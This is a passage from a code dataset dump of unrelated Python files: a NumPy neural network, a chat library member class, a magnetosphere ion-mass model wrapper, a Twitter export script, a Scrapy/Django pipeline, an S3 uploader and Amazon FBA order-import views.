onehot)\n        \"\"\"\n        # Analytical gradients (no dropout, no regularization)\n        self.forward(data, 1.0, 1.0)  # compute activations\n        self.backward(labels, 0, 0)  # compute gradients (no SGD update)\n        grads = np.concatenate([layer.dw.flatten() for layer in self])\n\n        # Numerical gradients\n        numgrads = np.array([])\n        epsilon = 1e-4  # perturbation\n        percent_complete = 0\n        counter = 0\n        for layer in self:\n            for i, row in enumerate(layer.w):\n                for j, _ in enumerate(row):\n                    # Print completion percent\n                    if counter % max(1, len(grads) // 100) == 0:\n                        percent_complete += 1\n                        print(\"%d percent finished...\"\n                              % percent_complete)\n\n                    # Add perturbation to a single weight\n                    layer.w[i, j] += epsilon\n                    # Forward pass with perturbed weight (no dropout)\n                    self.forward(data)\n                    # Cost with perturbed weight (no regularization)\n                    cost_plus = self.cost(labels, 0, 0)\n\n                    # Subtract perturbation from the same single weight\n                    layer.w[i, j] -= 2 * epsilon\n                    # Forward pass with perturbed weight (no dropout)\n                    self.forward(data)\n                    # Cost with perturbed weight (no regularization)\n                    cost_minus = self.cost(labels, 0, 0)\n\n                    # Reset the weight to its original value\n                    layer.w[i, j] += epsilon\n                    # Compute numerical gradient from cost difference\n                    diff = cost_plus - cost_minus\n                    numgrads = np.append(numgrads, diff / (2 * epsilon))\n                    counter += 1\n\n        # Metric for gradient accuracy (should be less than 10^-8)\n        num = np.linalg.norm(grads - numgrads)\n        denom = np.linalg.norm(grads + numgrads)\n        metric = num / denom\n\n        if metric < 1e-8:\n            return \"Passed\"\n        else:\n            return (\"Failed\", metric)\n\n\nclass Layer(object):\n    \"\"\"Store weights and compute forward and backward passes.\"\"\"\n\n    def __init__(self, size):\n        \"\"\"Initialize with size.\"\"\"\n        self.size = size\n        self.w = None  # set by init_params on forward pass\n        self.b = None  # set by init_params on forward pass\n\n    def __repr__(self):\n        \"\"\"Return string describing layer with name from child class.\"\"\"\n        return '%s %d' % (self.__class__.__name__, self.size)\n\n    def init_params(self, prior_layer_size):\n        \"\"\"Initialize weight matrix and bias vector.\"\"\"\n        # Weights Gaussian with extra small variance\n        self.w = np.random.randn(\n            prior_layer_size, self.size) / 
np.sqrt(prior_layer_size)\n        # Biases 0.1 so we don't start with dead ReLUs\n        self.b = np.ones((1, self.size)) / 10.\n\n    def forward(self, a):\n        \"\"\"Push prior layer activation to this layer activation.\"\"\"\n        # Initialize weights and biases on first call\n        if self.w is None:\n            self.init_params(a.shape[1])\n        # Activation of prior layer\n        self.a = a\n        # Weighted input to this layer\n        self.z = a.dot(self.w) + self.b\n        # Activation of this layer\n        return self.f(self.z)\n\n    def backward(self, da, l1_coef, l2_coef):\n        \"\"\"Pull Jacobian at activation to prior layer activation.\"\"\"\n        # Jacobian of weighted input\n        dz = da * self.df(self.z)\n        # Jacobian of weights\n        self.dw = self.a.T.dot(dz)\n        # Add derivative of l1_penalty to weights Jacobian\n        self.dw += (l1_coef / len(da)) * np.sign(self.w)\n        # Add derivative of l2_penalty to weights Jacobian\n        self.dw += (l2_coef / len(da)) * self.w\n        # Jacobian of bias (bias is not regularized)\n        self.db = dz.mean(axis=0)\n        # Jacobian of prior layer's activation\n        return np.dot(dz, self.w.T)\n\n\n# ----------------------------- #\n#                               #\n#     Activation functions      #\n#                               #\n# ----------------------------- #\n\n\n\"\"\"\nThese are just activation functions. Computation\nof weighted input, activation, and backward pass\nis handled by the parent class, 'Layer'.\n\nThat means, if you want to specify a new fully-\nconnected layer type, you just need to define\nthe function and its derivative in a new class\nbelow. No need to write out the computation of\nweighted input, activation, or weight update,\nsince the parent class 'Layer' takes care of it.\n\"\"\"\n\n\nclass Linear(Layer):\n    \"\"\"Linear activation.\"\"\"\n\n    def f(self, x):\n        \"\"\"Return linear activation, which is just the input itself.\n\n        :type x: ndarray\n        :param x: weighted input to layer\n        \"\"\"\n        return x\n\n    def df(self, x):\n        \"\"\"Return derivative tensor of linear activation tensor.\n\n        :type x: ndarray\n        :param x: weighted input to layer\n        \"\"\"\n        return np.ones_like(x)\n\n\nclass Sigmoid(Layer):\n    \"\"\"Numerically-stable sigmoid activation.\"\"\"\n\n    def f(self, x):\n        \"\"\"Return numerically-stable sigmoid activation.\n\n        :type x: ndarray\n        :param x: weighted input to layer\n        \"\"\"\n        # Evaluate exp only on -|x| so neither branch can overflow\n        y = np.exp(-np.abs(x))\n        return np.where(x >= 0, 1 / (1 + y), y / (1 + y))\n\n    def df(self, x):\n        \"\"\"Return derivative of sigmoid evaluated at x.\n\n        :type x: ndarray\n        :param x: weighted input to layer\n        \"\"\"\n        y = self.f(x)\n        return y * (1 - y)\n\n\nclass Tanh(Layer):\n    \"\"\"Hyperbolic tangent activation.\"\"\"\n\n    def f(self, x):\n        \"\"\"Return hyperbolic tangent activation.\n\n        :type x: ndarray\n        :param x: weighted input to layer\n        \"\"\"\n        return np.tanh(x)\n\n    def df(self, x):\n        \"\"\"Return derivative of hyperbolic tangent evaluated at x.\n\n        :type x: ndarray\n        :param x: weighted input to layer\n        \"\"\"\n        return 1 - np.tanh(x)**2\n\n\nclass Relu(Layer):\n    \"\"\"Rectified linear unit activation.\"\"\"\n\n    def f(self, x):\n        \"\"\"Return ReLU activation.\n\n        :type x: ndarray\n        :param x: weighted input to layer\n        \"\"\"\n        try:\n            # In-place maximum (writes into x, i.e. self.z) to save memory\n            return np.maximum(x, 0, x)\n        except TypeError:\n            # When x is not iterable (e.g. 
batch size = 1)\n return np.maximum(x, 0)\n\n def df(self, x):\n \"\"\"Return derivative of ReLU evaluated at x.\n\n :type x: ndarray\n :param x: weighted input to layer\n \"\"\"\n return (x > 0) * 1\n\n\nclass Softmax(Layer):\n \"\"\"Row-wise vector-to-vector softmax transformation.\"\"\"\n\n def f(self, matrix):\n \"\"\"Return matrix after rows are cast to softmax distributions.\n\n :type matrix: ndarray\n :param matrix: row per example; col per class\n\n :returns: (ndarray) of same shape whose rows are softmaxed\n \"\"\"\n # Allow passing vectors\n if matrix.ndim == 1:\n matrix = np.array([matrix])\n\n # Subtract the max of each row from each row\n row_maxes = np.max(matrix, axis=1)\n row_maxes = row_maxes[:, np.newaxis] # for broadcasting\n matrix = matrix - row_maxes\n\n # Compute softmax\n e_matrix = np.exp(matrix)\n row_sums = e_matrix.sum(axis=1)\n # Store output for backward pass\n self.output = e_matrix / row_sums[:, None]\n return self.output\n\n def backward(self, labels, l1_coef, l2_coef):\n \"\"\"Return Jacobian of prior layer activation assuming nll cost.\n\n :type labels: ndarray\n :param labels: each row a onehot class label\n\n :type l1_coef: float\n :param l1_coef: penalty on mean of absolute values of weights\n\n :type l2_coef: float\n :param l2_coef: penalty on to mean of squared weights\n \"\"\"\n # Jacobian of weighted input\n dz = (self.output - labels) / len(labels)\n # Jacobian of weights\n self.dw = np.dot(self.a.T, dz)\n\n # Add derivative of l1_penalty to weights Jacobian\n # ------------------------------------------------\n # Since l1 is summed absolute value of weights scaled by\n # (1/n) * l1_coef, the slope is -1 or 1 for weights being\n # positive or negative respectively\n self.dw += (l1_coef / dz.shape[0]) * np.sign(self.w)\n\n # Add derivative of l2_penalty to weights Jacobian\n # ------------------------------------------------\n # Since l2 is summed squared weights scaled by (1/2n) * l2_coef\n # the slope is (l2_coef / n) * weights\n self.dw += (l2_coef / dz.shape[0]) * self.w\n\n # Jacobian of bias (no regularization on biases)\n self.db = dz.mean(axis=0)\n # Jacobian of prior layer activation\n return np.dot(dz, self.w.T)\n\n\n# ----------------------------- #\n# #\n# Convolution layers #\n# #\n# ----------------------------- #\n\n\nclass Convolution:\n \"\"\"Convolution layer.\"\"\"\n\n def __init__(self, kernel_shape, n_kernels, stride=1):\n \"\"\"Initialize with kernel shape and stride.\"\"\"\n self.kernel_shape = kernel_shape\n self.n_kernels = n_kernels\n self.stride = stride\n self.W = None\n self.b = None\n\n def init_params(self, prior_layer_channels):\n \"\"\"Initialize weight matrix and bias vector.\n\n Note:\n Needs size of previous layer to determine number of\n rows in weight matrix. 
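(Shape assumption, since this layer is an unimplemented stub: for a\n            channels-first input the weights would plausibly be an\n            (n_kernels, in_channels, kh, kw) tensor with (n_kernels,) biases.)\n            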
We ascertain size of previous\n layer by number of columns in 'a' when forward method\n is called for the first time.\n\n :type prior_layer_size: int\n :param prior_layer_size: width of prior layer\n\n :returns: None\n \"\"\"\n pass\n\n\nclass MaxPooling:\n \"\"\"Max pooling layer.\"\"\"\n\n def __init__(self, k_shape, stride=1):\n \"\"\"Initialize with kernel shape and stride.\"\"\"\n self.k_shape = k_shape\n self.stride = stride\n\n def forward(self, images):\n \"\"\"Return max element in each kernel window for each image.\n\n :type images: ndarray\n :param images: 3-d tensor where images are the first dimension\n\n :returns: 3-d tensor where output images are the first dimension\n \"\"\"\n max_values = [] # for forward\n max_indices = [] # for backward\n\n # We track the lower-right corner of the kernel\n for image in images:\n row = self.k_shape[0] # bottom of kernel + 1\n while row <= image.shape[0]:\n col = self.k_shape[1] # right of kernel + 1\n while col <= image.shape[1]:\n box = image[row - self.k_shape[0]:row,\n col - self.k_shape[1]:col]\n max_values.append(box.max()) # for forward\n max_indices.append(box.argmax()) # for backward\n col += 1\n row += 1\n\n # Cast to numpy for reshaping\n max_values = np.array(max_values)\n max_indices = np.array(max_indices)\n\n # Shape of each output image\n m = int((images.shape[1] - self.k_shape[0]) / self.stride) + 1\n n = int((images.shape[2] - self.k_shape[1]) / self.stride) + 1\n\n # Reshape and save both for backward pass\n self.max_indices = max_indices.reshape(len(images), m, n)\n self.max_values = max_values.reshape((len(images), m, n))\n\n return self.max_values\n\n def backward(self, delta_output_images):\n \"\"\"Backward through max pooling layer.\"\"\"\n for d_img in delta_output_images:\n for i, row in enumerate(d_img):\n pass\n\n\n# ----------------------------- #\n# #\n# Miscelaneous helper functions #\n# #\n# ----------------------------- #\n\n\ndef shuffle_together(a, b):\n \"\"\"Return a tuple of (a, b) after shuffling together by first index.\"\"\"\n together = list(zip(a, b))\n shuffle(together)\n a[:], b[:] = zip(*together)\n return a, b\n\n\ndef train_val_split(data, labels, val_proportion):\n \"\"\"Return train data, train labels, val data, val labels.\n\n :type data: iterable\n :param data: first dimension should be examples\n\n :type labels: iterable\n \"\"\"\n data, labels = shuffle_together(data, labels)\n split_index = int((1 - val_proportion) * len(data))\n train_data, val_data = data[:split_index], data[split_index:]\n train_labels, val_labels = labels[:split_index], labels[split_index:]\n return train_data, train_labels, val_data, val_labels\n\n\ndef minibatches(data, labels, size):\n \"\"\"Yield mini-batched tuples of features and labels.\n\n :type data: ndarray\n :param data: feature set\n\n :type labels: ndarray\n :param labels: correct class labels\n\n :yields: (tuple) a minibatch of (features, labels)\n \"\"\"\n data, labels = shuffle_together(data, labels)\n # Yield minibatches until consumed\n k = 0\n while (k + 1) * size < len(data):\n # Here we'll fit another full size minibatch\n yield data[k * size:(k + 1) * size], labels[k * size:(k + 1) * size]\n k = k + 1\n # Consume remaining items and then issue stop_iter()\n yield data[k * size:], labels[k * size:]\n\n\ndef load(dataset, validation_proportion):\n \"\"\"Load specified dataset and split training into validation.\"\"\"\n # Load chosen dataset\n print(\"Loading %s from /home/USER/data/%s\" % (dataset, dataset))\n dataset = {\n 'mnist': mnist,\n 
'cifar10': cifar10,\n    }[dataset]\n    train_images, train_labels, test_images, test_labels = dataset(onehot=True)\n    print(\"Done.\")\n\n    # Split validation set from training set\n    train_images, train_labels, val_images, val_labels = \\\n        train_val_split(train_images, train_labels, validation_proportion)\n\n    return {\n        'train_images': train_images,\n        'val_images': val_images,\n        'test_images': test_images,\n        'train_labels': train_labels,\n        'val_labels': val_labels,\n        'test_labels': test_labels,\n    }\n\n\n# ----------------------------- #\n#                               #\n#       Training function       #\n#                               #\n# ----------------------------- #\n\n\ndef train(network, n_epochs, patience, eta, minibatch_size,\n          input_keep_prob, hidden_keep_prob, l1_coef, l2_coef,\n          eta_taper, clipping_threshold, numerical_gradient_checking,\n          train_images, val_images, test_images,\n          train_labels, val_labels, test_labels, **kwargs):\n    \"\"\"Train until no improvement seen in some number of epochs.\"\"\"\n    print()\n    print(\"Parameters\")\n    print(\"----------\")\n    for key in params:\n        print(\"{}: {}\".format(key, params[key]))\n    print(\"----------\")\n\n    print()\n    print(\"Training...\")\n    print(\"New best validation cost = *\")\n    epoch = 0  # count epochs\n    min_cost = 1e10  # track minimum cost seen so far\n    epochs_since_min = 0  # track epochs since last new minimum\n\n    # Training\n    # -----------------------------------------------------------------\n    while epochs_since_min < patience and epoch < n_epochs:\n        epoch += 1\n        for images, labels in minibatches(\n                train_images, train_labels, minibatch_size):\n            # Iterate through all minibatches\n            network.forward(images, input_keep_prob, hidden_keep_prob)\n            network.backward(labels, l1_coef, l2_coef)\n            network.sgd(eta, eta_taper, epoch, clipping_threshold)\n\n        # Since we check validation cost and accuracy with no\n        # dropout applied, we need to scale our weights.\n        #\n        # We scale weights to correct for dropout, which pushes\n        # the network to learn bigger weights on account of\n        # some activations being missing each train iteration.\n        network[0].w *= input_keep_prob\n        for layer in network[1:]:\n            layer.w *= hidden_keep_prob\n\n        # Get cost (no dropout)\n        network.forward(val_images)\n        cost = network.cost(val_labels, l1_coef, l2_coef)\n\n        # Update minimum cost seen\n        if cost < min_cost:\n            tag = '*'\n            min_cost = cost\n            epochs_since_min = 0\n        else:\n            tag = ''\n            epochs_since_min += 1\n\n        # Compute and print desired stats for epoch\n        # -- TODO: Don't reach into global parameters for this\n        stats = 'epoch {:<2d}'.format(epoch)\n        if params['cost']:\n            stats += ' | cost {:.3f}'.format(cost)\n        if params['val_acc']:\n            val_acc = network.accuracy(val_labels)\n            stats += ' | val acc {:.3f}'.format(val_acc)\n        if params['top_k_val_acc']:\n            k = params['top_k_val_acc']\n            top_k_val_acc = network.top_k_accuracy(val_labels, k)\n            stats += ' | top {} val acc {:.3f}'.format(k, top_k_val_acc)\n        print(stats + ' | {}'.format(tag))\n\n        # Unscale the weights so we can continue training with dropout\n        network[0].w /= input_keep_prob\n        for layer in network[1:]:\n            layer.w /= hidden_keep_prob\n    # -----------------------------------------------------------------\n    # End training\n\n    # Print the reason that training ended\n    print(\"-----------------\")\n    if epochs_since_min >= patience:\n        print(\"No new minimum cost seen in %d epochs.\"\n              % epochs_since_min)\n    elif epoch >= n_epochs:\n        print(\"Completed %d epochs.\" % epoch)\n    print(\"Ending training.\")\n\n    # Scale weights to repair dropout\n    network[0].w *= input_keep_prob\n    for layer in network[1:]:\n        layer.w *= 
hidden_keep_prob\n\n # Get test accuracy (no dropout)\n network.forward(test_images)\n test_acc = network.accuracy(test_labels)\n print(\"test acc %.3f\" % test_acc)\n\n # Check numerical gradients\n #\n # We check at the end of training to because\n # negative log likelihood cost gives inf's for\n # very incorrect class predictions, which tend\n # to occur near the beginning of training.\n if numerical_gradient_checking:\n print(\"Checking numerical gradients...\")\n print(network.numerical_gradient_check(val_images, val_labels))\n\n\ndef main():\n \"\"\"Construct and train user-specified achitecture.\"\"\"\n data = load(params['dataset'], params['val_proportion'])\n network = Network()\n for layer in params['layers']:\n layer_type = {\n 'Linear': Linear,\n 'Sigmoid': Sigmoid,\n 'Tanh': Tanh,\n 'Relu': Relu,\n 'Softmax': Softmax,\n }[layer[0]]\n layer_size = layer[1]\n network.append(layer_type, layer_size)\n train(network, **data, **params)\n\nif __name__ == '__main__':\n main()\n","sub_path":"pymlp.py","file_name":"pymlp.py","file_ext":"py","file_size_in_byte":31414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"250967782","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Optional\n\nfrom .user import User\n\nif TYPE_CHECKING:\n from .server import Server\n from .state import State\n from .types import Member as MemberPayload\n\n\n__all__ = (\"Member\",)\n\ndef flattern_user(member: Member, user: User):\n for attr in user.__flattern_attributes__:\n setattr(member, attr, getattr(user, attr))\n\nclass Member(User):\n \"\"\"Represents a member of a server, subclasses :class:`User`\n \n Attributes\n -----------\n nickname: Optional[:class:`str`]\n The nickname of the member if any\n roles: list[:class:`Role`]\n The roles of the member, ordered by the role's rank in decending order\n server: :class:`Server`\n The server the member belongs to\n \"\"\"\n __slots__ = (\"_state\", \"nickname\", \"roles\", \"server\")\n \n def __init__(self, data: MemberPayload, server: Server, state: State):\n user = state.get_user(data[\"_id\"][\"user\"])\n assert user\n flattern_user(self, user)\n\n self._state = state\n self.nickname = data.get(\"nickname\")\n roles = []\n\n for role in (server.get_role(role_id) for role_id in data.get(\"roles\", [])):\n if role:\n roles.append(role)\n\n self.roles = sorted(roles, key=lambda role: role.rank, reverse=True)\n \n self.server = server\n\n @property\n def owner(self) -> Optional[User]:\n owner_id = self.owner_id\n\n if not owner_id:\n return\n\n return self.state.get_user(owner_id)\n","sub_path":"revolt/member.py","file_name":"member.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"412537022","text":"import numpy as np\nfrom ._CFunctions import _CgetAvMav,_CgetAvMavCart,_CgetScaledMav,_CgetScaledMavCart\nfrom ._CTConv import _CTConv\n\ndef Mav(x,y,SMR=None,Coord='xy',ShowDC=True,OnlyDC=False,Validate=True,m=[1,3]):\n\t'''\n\tGet the combined cold average ion mass model output for a given set \n\tof input coordinates.\n\t\n\tInputs\n\t======\n\tx : float\n\t\tArray or scalar coordinate (see Coord for more info).\n\ty : float\n\t\tArray or scalar coordinate (see Coord for more info).\n\tSMR : float | None\n\t\tSet to None for the average model, or a float (scalar or array \n\t\twith the same shape as x and y) for the model which is scaled by\n\t\tthe SMR index.\n\tCoord : 
str\n\t\t'xy'|'ml' - Denotes the input coordinates provided by the inputs\n\t\tx and y, where Coord='xy' corresponds to the x and y SM \n\t\tcoordinates and Coord='ml' means that x and y represent MLT (in\n\t\thours) and L-shell (in R_e), respectively.\n\tShowDC : bool\n\t\tIf True (default) then the DC component is included in the model \n\t\toutput, otherwise the output just contains the periodic \n\t\tcomponents of the model.\n\tOnlyDC : bool\n\t\tIf True (default = False) then the periodic components are \n\t\tignored and only the DC component is returned.\n\tValidate : bool\n\t\tIf True (default) then the positions are checked for validity \n\t\t(2 <= L <= 5.9), where invalid ones are set to NaN.\n\tm : int\n\t\tThis should be a 2-element list/tuple/array which contains the\n\t\tlowest and highest m-numbers to include in the output (default =\n\t\t[1,3]).\n\t\t\n\tReturns\n\t=======\n\tout : float\n\t\tArray of average ion mass (amu).\n\t\n\t'''\n\t\n\t\n\t#get the number of elements first\n\t_n = np.int32(np.size(x))\n\t\n\t#work out the shape of the input data\n\tsh = np.shape(x)\n\t\n\t#select the possible models based on the input coords\n\tif Coord == 'ml':\n\t\t#MLT and L shell\n\t\tav = _CgetAvMav\n\t\tann = _CgetScaledMav\n\telse:\n\t\t#x and y SM\n\t\tav = _CgetAvMavCart\n\t\tann = _CgetScaledMavCart\n\t\n\t#now format the positions correctly\n\t_x = _CTConv(x,'c_float_ptr')\n\t_y = _CTConv(y,'c_float_ptr')\n\t_ShowDC = _CTConv(ShowDC,'c_bool')\n\t_OnlyDC = _CTConv(OnlyDC,'c_bool')\n\t_Validate = _CTConv(Validate,'c_bool')\n\t_m0 = _CTConv(m[0],'c_int')\n\t_m1 = _CTConv(m[1],'c_int')\n\t\n\t#create the output array\n\t_out = np.zeros(_n,dtype='float32')\n\n\t#select and run the model based on whether we have the scaling parameter\n\tif SMR is None:\n\t\t#average model\n\t\tav(_n,_x,_y,_ShowDC,_OnlyDC,_Validate,_m0,_m1,_out)\n\telse:\n\t\t#work out the scaling parameter\n\t\tif np.size(SMR) == 1:\n\t\t\t_smr = np.zeros(_n,dtype='float32') + SMR\n\t\telse:\n\t\t\t_smr = _CTConv(SMR,'c_float_ptr')\n\t\tann(_n,_x,_y,_smr,_ShowDC,_OnlyDC,_Validate,_m0,_m1,_out)\n\t\t\n\t#return to original shape\n\tout = _out.reshape(sh)\n\t\n\treturn out\n\t\t\n","sub_path":"spicedmodel/Mav.py","file_name":"Mav.py","file_ext":"py","file_size_in_byte":2659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"567683719","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport twitter\nfrom pit import Pit\nimport time\n\nNOT_LIKES_LIST_FILE = 'not_likes.txt'\nLIKES_MAX_COUNT = 200\n\n\ndef write_no_likes(no_likes, fp):\n num_lines = 0\n for no_like in no_likes:\n text = no_like.text.replace('\\n', '')\n fp.writelines(text)\n fp.writelines('\\n')\n num_lines += 1\n return num_lines\n\n\ndef main():\n conf = Pit.get('twitter.com', {'require': {'consumer_key': 'ckey',\n 'consumer_secret': 'csecret',\n 'access_token_key': 'atkey',\n 'access_token_secret':\n 'atsecret'}})\n\n api = twitter.Api(consumer_key=conf['consumer_key'],\n consumer_secret=conf['consumer_secret'],\n access_token_key=conf['access_token_key'],\n access_token_secret=conf['access_token_secret'],\n sleep_on_rate_limit=True)\n\n max_id = None\n total_no_likes = 0\n with open(NOT_LIKES_LIST_FILE, 'w') as fp:\n while True:\n home = api.GetUserTimeline(\n max_id=max_id, count=LIKES_MAX_COUNT, exclude_replies=True)\n if len(home) == 0:\n break\n else:\n total_no_likes += write_no_likes(home, fp)\n max_id = home[-1].id - 1\n time.sleep(60.5)\n\n print('Total no likes:', 
total_no_likes)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"gen_not_like_list.py","file_name":"gen_not_like_list.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"264513298","text":"# -*- coding: utf-8 -*-\nimport django\nimport os\nimport re\nimport scrapy\nimport sys\nimport requests as r\n\nDEBUG = True\nif DEBUG:\n PATH_TO_DJANGO = '/Users/nikitatonkoskurov/PycharmProjects/domofound2/'\nelse:\n PATH_TO_DJANGO = '/var/www/dom/src/'\n\nsys.path.append(PATH_TO_DJANGO)\nos.environ['DJANGO_SETTINGS_MODULE'] = 'domofound2.settings'\ndjango.setup()\nfrom apps.base.models import HouseModel, HouseInfo, Image\n\n\ndef store_images(house_id_val, images):\n house_id = HouseModel.objects.filter(house_id=house_id_val)\n if house_id:\n house = HouseModel.objects.get(house_id=house_id_val)\n for image in images:\n Image.objects.create(image_link=image, house=house)\n else:\n print('Cant find house with this house_id')\n\n\nclass KvadroomV1Pipeline:\n def process_item(self, item, spider):\n if item['mode'] == 0:\n self.save_house(item)\n else:\n self.save_info(item)\n return item\n\n def save_house(self, item):\n house_id_val = item['house_id']\n img_val = item['img']\n title_val = item['title']\n link_val = item['link']\n price_val = item['price']\n address_val = item['address']\n host_val = item['host']\n city_val = item['city']\n x_cord_val = item['cords'][0]\n y_cord_val = item['cords'][1]\n house_type_val = item['house_type']\n offer_type = item['offer_type']\n house = HouseModel.objects.filter(house_id=house_id_val)\n if house:\n print('This row is already exist')\n else:\n HouseModel.objects.create(house_id=house_id_val, title=title_val, link=link_val,\n address=address_val,\n Host=host_val, title_image=img_val, price=price_val, city=city_val,\n x_cord=x_cord_val, y_cord=y_cord_val, type=house_type_val, ready_to_go=False,\n offer_type=offer_type)\n\n def save_info(self, item):\n house_id_val = int(item['house_id'])\n type_of_participation_val = item['type_of_participation']\n official_builder_val = item['official_builder']\n name_of_build_val = item['name_of_build']\n decoration_val = item['decoration']\n house_type_val = item['house_type']\n num_of_rooms_val = item['num_of_rooms']\n total_area_val = item['total_area']\n living_area_val = item['living_area']\n kitchen_area_val = item['kitchen_area']\n floor_val = item['floor']\n floor_count_val = item['floor_count']\n land_area = item['land_area']\n data = item['data'],\n img_set = item['img_set']\n phone_val = item['phone_num']\n if HouseInfo.objects.filter(house_id=house_id_val):\n print('this row is already exist')\n else:\n info = HouseInfo.objects.create(house_id=house_id_val, type_of_participation=type_of_participation_val,\n official_builder=official_builder_val, name_of_build=name_of_build_val,\n decoration=decoration_val, floor=floor_val,\n floor_count=floor_count_val, house_type=house_type_val,\n num_of_rooms=num_of_rooms_val, living_area=living_area_val,\n kitchen_area=kitchen_area_val,\n phone=phone_val, total_area=total_area_val, land_area=land_area)\n store_images(house_id_val, img_set)\n info.save()\n print('Add info to house')\n house = HouseModel.objects.get(house_id=house_id_val)\n house.house_info = info\n house.data = data\n house.ready_to_go = True\n 
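# persist the flags set above so the listing goes live\n            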
house.save()\n","sub_path":"kvadroom_v1/kvadroom_v1/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":3879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"164480684","text":"# -*- coding: UTF-8 -*-\nimport requests\n\nurl = 'http://httpbin.org/post'\n\n\n'''\npost参数内如果包含了%,传递时会进行转义。\n以下为fiddler内截取的post参数,直接复制到到字典d内,%会被转义为%25,post结果会出错\naction_mode=apply&username=admin&Pwd=YWRtaW4%3D&_pageStyle=pc\n%3D需要转意为“=”,因此Pwd=\"YWRtaW4=\"\n\n'''\nd = {'key1': 'value1', 'key2': 'value2'}\nr = requests.post(url, data=d)\nprint(r.text)\n","sub_path":"网络相关/requests模块/post范例.py","file_name":"post范例.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"264762740","text":"import json\nimport sys\nimport traceback\n\nfrom django.http import JsonResponse\n\nfrom amzn_utilities import _create_sale, _save_objects, _FBA_start_date\nfrom .thirdparty_apis.amazon_sellercentral import load_orders, order_details, get_order\nfrom sales.models import Sale\n\n\nimport logging\nlogger = logging.getLogger('default')\n\n\ndef missing_amazon(request):\n try:\n summary_msg, error_msgs = amazon_order(request.user.username, request.body)\n return JsonResponse({'summary': summary_msg, 'errors': error_msgs})\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback.print_tb(exc_traceback, limit=1, file=sys.stdout)\n msg = 'FBA fill-missing failed on %s, %s' % (exc_type, exc_value)\n return JsonResponse({'summary': msg, 'errors': []})\n\n\ndef upload(request):\n try:\n summary_msg, error_msgs = load_FBA(request.user.username)\n return JsonResponse({'summary': summary_msg, 'errors': error_msgs})\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback.print_tb(exc_traceback, limit=1, file=sys.stdout)\n msg = 'FBA upload failed on %s, %s' % (exc_type, exc_value)\n return JsonResponse({'summary': msg, 'errors': []})\n\n\ndef amazon_order(user, data):\n errors = []\n order_id = json.loads(data).get('input_value')\n if Sale.objects.filter(external_channel_id=order_id).count() > 0:\n msg = '%s already exists' % order_id\n return msg, errors\n else:\n try:\n s, us = _create_sale(get_order(order_id), order_details(order_id))\n _save_objects(s, us, 'AFN')\n logger.info('%s saved AMZN order %s' % (user, order_id))\n msg = '%s created order %s' % (user, order_id)\n except:\n logger.exception('%s failed to save order and/or fulfillment for AMZN order %s' % (user, object_id))\n exc_type, exc_value, exc_traceback = sys.exc_info()\n msg = exc_value\n return msg, errors\n\n\ndef load_FBA(user, from_date=None):\n if not from_date:\n from_date = _FBA_start_date()\n\n orders = load_orders(from_date)\n orders_dict = dict((o.get('AmazonOrderId'), o) for o in orders)\n\n FBA_ids = [o.get('AmazonOrderId') for o in orders]\n existing_ids = [s['external_channel_id'] for s in Sale.objects.filter(external_channel_id__in=FBA_ids).values('external_channel_id')]\n\n new_ids = [o for o in FBA_ids if o not in existing_ids]\n cmplt_new_ids = [o for o in new_ids if orders_dict.get(o).get('OrderStatus') != 'Pending']\n new_order_ctr = 0\n bad_order_ctr = 0\n errors = []\n\n for o in cmplt_new_ids:\n try:\n od = order_details(o)\n except:\n logger.exception('Failed to get order details for AMZN order %s' % o)\n\n sale, unitsales = _create_sale(orders_dict.get(o), od)\n\n try:\n _save_objects(sale, unitsales, 
orders_dict.get(o).get('FulfillmentChannel'))\n logger.info('%s saved AMZN order %s' % (user, o))\n new_order_ctr += 1\n except:\n logger.exception('%s failed to save order and/or fulfillment for AMZN order %s' % (user, o))\n bad_order_ctr += 1\n\n summary_msg = ('Loaded FBA orders: %d new orders, %d bad orders'\n % (new_order_ctr, bad_order_ctr))\n return summary_msg, errors\n","sub_path":"savor/importers/FBA.py","file_name":"FBA.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"318566426","text":"import sys\nimport os\nimport botocore\nimport traceback\nimport boto3\nimport argparse\n\n\ndef main():\n \"\"\"Main entry point for the program.\"\"\"\n arg_parser = argparse.ArgumentParser(description='Processes a given lte xml files s3 bucket.')\n arg_parser.add_argument('--s3_bucket', action=\"store\", dest=\"s3_bucket\",\n help=\"Input s3 bucket name\", required=True, type=str)\n arg_parser.add_argument('--folder_prefix', action=\"store\", dest=\"folder_prefix\",\n help=\"folder prefix to use\", required=True, type=str)\n arg_parser.add_argument('--files', action=\"store\", dest=\"files\",\n help=\"comma separated list of files\", required=True, type=str)\n args = arg_parser.parse_args()\n files = args.files.split(\",\")\n for file in files:\n # print(file)\n upload_to_s3(args.s3_bucket, args.folder_prefix, file)\n\n\ndef upload_to_s3(bucket, prefix, local_file_path):\n try:\n s3 = boto3.resource('s3')\n local_filename = os.path.basename(local_file_path)\n s3.Bucket(bucket).upload_file(local_file_path, prefix + \"/\" + local_filename)\n except botocore.exceptions.ClientError as e:\n print(\"Exception: \\\"%s\\\" occurred while uploading file, exiting..\" % str(e))\n traceback.print_exc()\n # sys.exit(-1)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"s3_utils.py","file_name":"s3_utils.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"141055434","text":"import datetime\n\nimport os\n\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import 